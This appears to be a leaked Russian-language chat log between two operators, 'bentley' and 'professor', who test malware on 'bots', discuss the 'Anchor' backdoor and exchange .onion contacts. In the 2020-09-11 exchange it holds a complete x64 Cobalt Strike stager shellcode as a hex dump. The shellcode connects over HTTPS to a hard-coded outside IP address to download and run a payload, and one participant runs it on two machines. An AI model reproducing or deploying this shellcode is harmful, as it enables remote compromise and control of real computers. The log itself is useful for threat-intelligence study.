2020-07-10T15:56:39 bentley -> professor
Првиет. Запустил файл, который просил дор

2020-07-10T15:57:00 professor -> bentley
здарова

2020-07-10T15:57:01 professor -> bentley
мимо =(

2020-07-10T15:57:38 bentley -> professor
что сделать?

2020-07-10T16:00:13 professor -> bentley
ничего(

2020-08-25T07:30:53 bentley -> professor
Привет.

2020-08-25T07:30:57 bentley -> professor
Нужны еще ВМ?

2020-08-25T07:33:56 professor -> bentley
привет
вероятно на первую половину дня, сейчас узнаю в течении полу часика и скажу сразу, накатываем АД сидим у себя и развернули еще параллельно

2020-08-25T07:34:15 bentley -> professor
Ок. Пока не троаеи тогда ))

2020-08-25T07:34:18 bentley -> professor
трогаем

2020-08-25T07:34:48 professor -> bentley
лав ю

2020-08-25T07:34:56 bentley -> professor
(Y)

2020-09-11T09:06:05 bentley -> professor
Привет

2020-09-11T09:06:51 professor -> bentley
йоу!

2020-09-11T09:07:15 bentley -> professor
Хочу проверить запуск шелкода на тестовых ботах

2020-09-11T09:09:29 professor -> bentley
у меня тольк кобальта шеллкод((
посплю придумаю какой попроще дать чтобы точно видно было результат

2020-09-11T09:09:35 professor -> bentley
но будет вот в таком формате

2020-09-11T09:09:41 professor -> bentley
fc48 83e4 f0e8 c800 0000 4151 4150 5251
5648 31d2 6548 8b52 6048 8b52 1848 8b52
2048 8b72 5048 0fb7 4a4a 4d31 c948 31c0
ac3c 617c 022c 2041 c1c9 0d41 01c1 e2ed
5241 5148 8b52 208b 423c 4801 d066 8178
180b 0275 728b 8088 0000 0048 85c0 7467
4801 d050 8b48 1844 8b40 2049 01d0 e356
48ff c941 8b34 8848 01d6 4d31 c948 31c0
ac41 c1c9 0d41 01c1 38e0 75f1 4c03 4c24
0845 39d1 75d8 5844 8b40 2449 01d0 6641
8b0c 4844 8b40 1c49 01d0 418b 0488 4801
d041 5841 585e 595a 4158 4159 415a 4883
ec20 4152 ffe0 5841 595a 488b 12e9 4fff
ffff 5d6a 0049 be77 696e 696e 6574 0041
5649 89e6 4c89 f141 ba4c 7726 07ff d548
31c9 4831 d24d 31c0 4d31 c941 5041 5041
ba3a 5679 a7ff d5e9 9300 0000 5a48 89c1
41b8 bb01 0000 4d31 c941 5141 516a 0341
5141 ba57 899f c6ff d5eb 795b 4889 c148
31d2 4989 d84d 31c9 5268 0032 c084 5252
41ba eb55 2e3b ffd5 4889 c648 83c3 506a
0a5f 4889 f1ba 1f00 0000 6a00 6880 3300
0049 89e0 41b9 0400 0000 41ba 7546 9e86
ffd5 4889 f148 89da 49c7 c0ff ffff ff4d
31c9 5252 41ba 2d06 187b ffd5 85c0 0f85
9d01 0000 48ff cf0f 848c 0100 00eb b3e9
e401 0000 e882 ffff ff2f 4d65 6e75 732e
6173 7078 0035 4f21 5025 4041 505b 345c
505a 5835 3428 505e 2937 4343 2937 7d24
4549 4341 522d 5354 414e 4441 5244 2d41
4e54 4956 4952 5553 2d54 4553 542d 4649
4c45 2124 482b 482a 0041 6363 6570 743a
202a 2f2a 0d0a 4163 6365 7074 2d4c 616e
6775 6167 653a 2065 6e2d 5553 2c65 6e3b
713d 302e 350d 0a52 6566 6572 6572 3a20
6874 7470 733a 2f2f 6c6f 6361 7469 6f6e
732e 736d 6173 6862 7572 6765 722e 636f
6d2f 7573 2f6b 792f 6c6f 7569 7376 696c
6c65 2f33 3132 2d73 2d66 6f75 7274 682d
7374 2e68 746d 6c0d 0a43 6f6e 6e65 6374
696f 6e3a 2063 6c6f 7365 0d0a 5573 6572
2d41 6765 6e74 3a20 4d6f 7a69 6c6c 612f
352e 3020 2857 696e 646f 7773 204e 5420
362e 3129 2041 7070 6c65 5765 624b 6974
2f35 3337 2e33 3620 284b 4854 4d4c 2c20
6c69 6b65 2047 6563 6b6f 290d 0a00 354f
2150 2540 4150 5b34 5c50 5a58 3534 2850
5e29 3743 4329 377d 2445 4943 4152 2d53
5441 4e44 4152 442d 414e 5449 5649 5255
532d 5445 5354 2d46 494c 4521 2448 2b48
2a00 354f 2150 2540 0041 bef0 b5a2 56ff
d548 31c9 ba00 0040 0041 b800 1000 0041
b940 0000 0041 ba58 a453 e5ff d548 9353
5348 89e7 4889 f148 89da 41b8 0020 0000
4989 f941 ba12 9689 e2ff d548 83c4 2085
c074 b666 8b07 4801 c385 c075 d758 5858
4805 0000 0000 50c3 e87f fdff ff31 3034
2e32 3433 2e34 322e 3133 3200 0000 0000

2020-09-11T09:09:53 bentley -> professor
Я запущу проверишь отстук?

2020-09-11T09:09:58 professor -> bentley
ага

2020-09-11T09:10:29 professor -> bentley
скажи как пусканешь
подожду)
это х64 версия если что

2020-09-11T09:10:46 bentley -> professor
да у меня все 64

2020-09-11T09:11:10 bentley -> professor
через Run code запускать да?

2020-09-11T09:11:45 professor -> bentley
видимо)

2020-09-11T09:12:29 bentley -> professor
Аша запустил на 2 машинах

2020-09-11T09:12:42 bentley -> professor
217.23.1.184 с этого айпи

2020-09-11T09:14:05 professor -> bentley
пусто)

2020-09-11T09:14:33 bentley -> professor
пока вейтинг

2020-09-11T09:14:56 bentley -> professor
на 2019 - выполнено

2020-09-11T09:15:16 bentley -> professor
pid:	0
msg:	invalid character

2020-09-11T09:15:31 professor -> bentley

» msg:      invalid character

2020-09-11T09:15:34 professor -> bentley
это вряд ли хороший признак

2020-09-11T09:15:45 bentley -> professor
fuf yfgbcfk Dfye

2020-09-11T09:15:48 bentley -> professor
Написал Вану

2020-09-11T09:16:24 professor -> bentley
ага
вы потестируйте - если что я зафискирую время точное когда отстучит

2020-09-11T09:16:29 professor -> bentley
а я посплю пока
мне 3 часа спать осталось

2020-09-11T09:16:48 bentley -> professor
Ага ок

2020-09-11T09:17:02 professor -> bentley
спасибо)

2020-09-11T14:16:12 professor -> bentley
привет еще раз
пробовали запускать?

2020-09-11T14:16:27 bentley -> professor
Да еще 3 раза

2020-10-12T13:19:28 professor -> bentley
привет, а накинь марселя контакт пожалуйста

2020-10-12T13:19:52 bentley -> professor
Привет сек

2020-10-12T13:20:09 bentley -> professor
marsel@q3mcco35auwcstmt.onion

2020-10-12T13:20:16 professor -> bentley
спасибо

2020-10-14T19:55:50 bentley -> professor
Привет

2020-10-14T19:56:27 bentley -> professor
Добавь пожалуйста, azot@q3mcco35auwcstmt.onion Он тестирует анкор Била

2020-10-14T19:59:32 professor -> bentley
да мне уже 20 раз все сказали, ща свяжусь с ним ща свяжусь
ток проснулся 
4 часа поспал

2020-10-14T19:59:33 professor -> bentley
е мае

2020-10-14T19:59:35 professor -> bentley
)))

2020-10-14T19:59:36 professor -> bentley
привет))))

2020-10-14T19:59:57 bentley -> professor
Извини что достаю.

2020-10-14T20:00:07 professor -> bentley
не не проблема)))

2020-10-14T20:00:11 professor -> bentley
все ок)))

2020-10-14T20:00:22 bentley -> professor
Таргет сказал мне грузить его ботов потом как все заработает

2020-10-14T20:00:29 professor -> bentley
куда грузить? чем грузить?

2020-10-14T20:00:50 bentley -> professor
Анкором Била

2020-10-14T20:00:58 professor -> bentley
не понял.
просто крепить входные точки?

2020-10-14T20:01:50 bentley -> professor
Думаю да. Я немного дилетант в этом. Он работает БК нашим и просит чтобы я у ботов запускал анкор.

2020-10-14T20:02:21 professor -> bentley
ну я это с ним сам обсужу

2020-10-14T20:02:26 professor -> bentley
не надо убивать бекдор

2020-10-14T20:02:31 bentley -> professor
Хорошо

2020-10-14T20:05:18 bentley -> professor
Давай с азотом на завтра? Он через час уходит. Или как тебе удобнее?

2020-10-14T20:05:26 professor -> bentley
+
завтра

2020-10-14T20:05:39 bentley -> professor
В какое время стукнуть тебе?

2020-10-14T20:06:04 professor -> bentley
в районе обеда буду, я не забуду - постараюсь сам написать сразу как на связи

2020-10-14T20:06:11 professor -> bentley
вдруг раньше получится

2020-10-14T20:06:23 bentley -> professor
Ок спс )

